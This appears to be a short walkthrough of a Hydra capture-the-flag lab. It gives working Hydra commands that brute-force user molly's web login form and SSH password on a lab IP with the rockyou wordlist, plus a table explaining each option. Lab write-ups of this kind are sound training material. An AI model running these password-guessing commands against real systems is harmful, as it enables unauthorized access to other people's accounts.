Hydra

🔗 Link
Walkthrough
Question 1
Use Hydra to bruteforce molly's web password. What is flag 1?


hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.194.251 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V -t 20
Option
Description
-l
molly
-P
/usr/share/wordlists/rockyou.txt
Target IP
10.10.194.251
Request Method
http-post-form
Page
/login
User Parameter
username=^USER^
Password Parameter
password=^PASS^
-t
Threads (20)

Question 2
Use Hydra to bruteforce molly's SSH password. What is flag 2?
hydra -t 4 -P /root/List/rockyou.txt -l molly ssh://10.10.194.251


Okay, Thats all for Hydra. Thank you for reading. 💮
By AdaniKamal
Last updated